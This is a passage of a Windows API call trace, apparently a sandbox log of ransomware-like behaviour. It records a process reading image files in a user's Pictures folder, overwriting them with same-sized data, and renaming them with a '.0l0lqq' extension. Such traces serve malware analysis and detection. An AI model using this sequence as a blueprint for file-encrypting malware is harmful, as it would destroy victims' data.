lpFileInformation=0x6d39c08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1519fd0, ftCreationTime.dwHighDateTime=0x1d5e5da, ftLastAccessTime.dwLowDateTime=0xb86e64d0, ftLastAccessTime.dwHighDateTime=0x1d5df83, ftLastWriteTime.dwLowDateTime=0xb86e64d0, ftLastWriteTime.dwHighDateTime=0x1d5df83, nFileSizeHigh=0x0, nFileSizeLow=0xfd14)) returned 1 [0254.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0254.834] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0254.834] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\wkltg-gzsxrj9thv7zme.jpg"), fInfoLevelId=0x0, lpFileInformation=0x6d39d28 | out: lpFileInformation=0x6d39d28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1519fd0, ftCreationTime.dwHighDateTime=0x1d5e5da, ftLastAccessTime.dwLowDateTime=0xb86e64d0, ftLastAccessTime.dwHighDateTime=0x1d5df83, ftLastWriteTime.dwLowDateTime=0xb86e64d0, ftLastWriteTime.dwHighDateTime=0x1d5df83, nFileSizeHigh=0x0, nFileSizeLow=0xfd14)) returned 1 [0254.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0254.835] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0254.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\wkltg-gzsxrj9thv7zme.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x588 [0254.835] GetFileType (hFile=0x588) returned 0x1 [0254.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0254.835] GetFileType (hFile=0x588) returned 0x1 [0254.835] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x26dd80 | out: lpFileSizeHigh=0x26dd80*=0x0) returned 0xfd14 [0254.836] ReadFile (in: hFile=0x588, lpBuffer=0x6d4041c, nNumberOfBytesToRead=0xfd14, lpNumberOfBytesRead=0x26dd2c, lpOverlapped=0x0 | out: lpBuffer=0x6d4041c*, lpNumberOfBytesRead=0x26dd2c*=0xfd14, lpOverlapped=0x0) returned 1 [0254.837] CloseHandle (hObject=0x588) returned 1 [0254.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0254.844] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\wkltg-gzsxrj9thv7zme.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x588 [0254.845] GetFileType (hFile=0x588) returned 0x1 [0254.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0254.845] GetFileType (hFile=0x588) returned 0x1 [0254.845] WriteFile (in: hFile=0x588, lpBuffer=0x6d82b60*, nNumberOfBytesToWrite=0xfd14, lpNumberOfBytesWritten=0x26dd1c, lpOverlapped=0x0 | out: lpBuffer=0x6d82b60*, lpNumberOfBytesWritten=0x26dd1c*=0xfd14, lpOverlapped=0x0) returned 1 [0254.847] CloseHandle (hObject=0x588) returned 1 [0254.848] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg", lpFilePart=0x0) returned 0x47 [0254.848] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg.0l0lqq", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg.0l0lqq", lpFilePart=0x0) returned 0x4e [0254.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0254.848] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\wkltg-gzsxrj9thv7zme.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26dd80 | out: lpFileInformation=0x26dd80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1519fd0, ftCreationTime.dwHighDateTime=0x1d5e5da, ftLastAccessTime.dwLowDateTime=0xb86e64d0, ftLastAccessTime.dwHighDateTime=0x1d5df83, ftLastWriteTime.dwLowDateTime=0x68dc0890, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0xfd14)) returned 1 [0254.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0254.849] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\wkltg-gzsxrj9thv7zme.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\wKltG-gZSXrJ9THv7zME.jpg.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\wkltg-gzsxrj9thv7zme.jpg.0l0lqq")) returned 1 [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.854] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.854] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.854] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.854] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.854] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.854] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.854] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.854] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.855] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.855] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.855] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.855] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.855] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.855] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.855] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.855] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0254.855] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\yvssvet7s.png"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bcc27f0, ftCreationTime.dwHighDateTime=0x1d5d87b, ftLastAccessTime.dwLowDateTime=0x9e28daf0, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x9e28daf0, ftLastWriteTime.dwHighDateTime=0x1d5e44d, nFileSizeHigh=0x0, nFileSizeLow=0x158f2)) returned 1 [0254.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0254.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0254.855] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\yvssvet7s.png"), fInfoLevelId=0x0, lpFileInformation=0x6d93150 | out: lpFileInformation=0x6d93150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bcc27f0, ftCreationTime.dwHighDateTime=0x1d5d87b, ftLastAccessTime.dwLowDateTime=0x9e28daf0, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x9e28daf0, ftLastWriteTime.dwHighDateTime=0x1d5e44d, nFileSizeHigh=0x0, nFileSizeLow=0x158f2)) returned 1 [0254.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0254.855] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.855] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0254.856] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\yvssvet7s.png"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bcc27f0, ftCreationTime.dwHighDateTime=0x1d5d87b, ftLastAccessTime.dwLowDateTime=0x9e28daf0, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x9e28daf0, ftLastWriteTime.dwHighDateTime=0x1d5e44d, nFileSizeHigh=0x0, nFileSizeLow=0x158f2)) returned 1 [0254.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0254.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26d8ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0254.856] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\yvssvet7s.png"), fInfoLevelId=0x0, lpFileInformation=0x26ddbc | out: lpFileInformation=0x26ddbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bcc27f0, ftCreationTime.dwHighDateTime=0x1d5d87b, ftLastAccessTime.dwLowDateTime=0x9e28daf0, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x9e28daf0, ftLastWriteTime.dwHighDateTime=0x1d5e44d, nFileSizeHigh=0x0, nFileSizeLow=0x158f2)) returned 1 [0254.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0254.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0254.856] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\yvssvet7s.png"), fInfoLevelId=0x0, lpFileInformation=0x6d96570 | out: lpFileInformation=0x6d96570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bcc27f0, ftCreationTime.dwHighDateTime=0x1d5d87b, ftLastAccessTime.dwLowDateTime=0x9e28daf0, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x9e28daf0, ftLastWriteTime.dwHighDateTime=0x1d5e44d, nFileSizeHigh=0x0, nFileSizeLow=0x158f2)) returned 1 [0254.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0254.857] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0254.857] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\yvssvet7s.png"), fInfoLevelId=0x0, lpFileInformation=0x6d96664 | out: lpFileInformation=0x6d96664*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bcc27f0, ftCreationTime.dwHighDateTime=0x1d5d87b, ftLastAccessTime.dwLowDateTime=0x9e28daf0, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x9e28daf0, ftLastWriteTime.dwHighDateTime=0x1d5e44d, nFileSizeHigh=0x0, nFileSizeLow=0x158f2)) returned 1 [0254.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0254.858] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0254.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\yvssvet7s.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x588 [0254.858] GetFileType (hFile=0x588) returned 0x1 [0254.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0254.858] GetFileType (hFile=0x588) returned 0x1 [0254.858] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x26dd80 | out: lpFileSizeHigh=0x26dd80*=0x0) returned 0x158f2 [0254.858] ReadFile (in: hFile=0x588, lpBuffer=0x32398d0, nNumberOfBytesToRead=0x158f2, lpNumberOfBytesRead=0x26dd2c, lpOverlapped=0x0 | out: lpBuffer=0x32398d0*, lpNumberOfBytesRead=0x26dd2c*=0x158f2, lpOverlapped=0x0) returned 1 [0254.860] CloseHandle (hObject=0x588) returned 1 [0254.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0254.864] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\yvssvet7s.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x588 [0254.865] GetFileType (hFile=0x588) returned 0x1 [0254.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0254.865] GetFileType (hFile=0x588) returned 0x1 [0254.865] WriteFile (in: hFile=0x588, lpBuffer=0x33941f0*, nNumberOfBytesToWrite=0x158f2, lpNumberOfBytesWritten=0x26dd1c, lpOverlapped=0x0 | out: lpBuffer=0x33941f0*, lpNumberOfBytesWritten=0x26dd1c*=0x158f2, lpOverlapped=0x0) returned 1 [0254.868] CloseHandle (hObject=0x588) returned 1 [0254.869] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png", lpFilePart=0x0) returned 0x3c [0254.870] GetFullPathNameW (in: 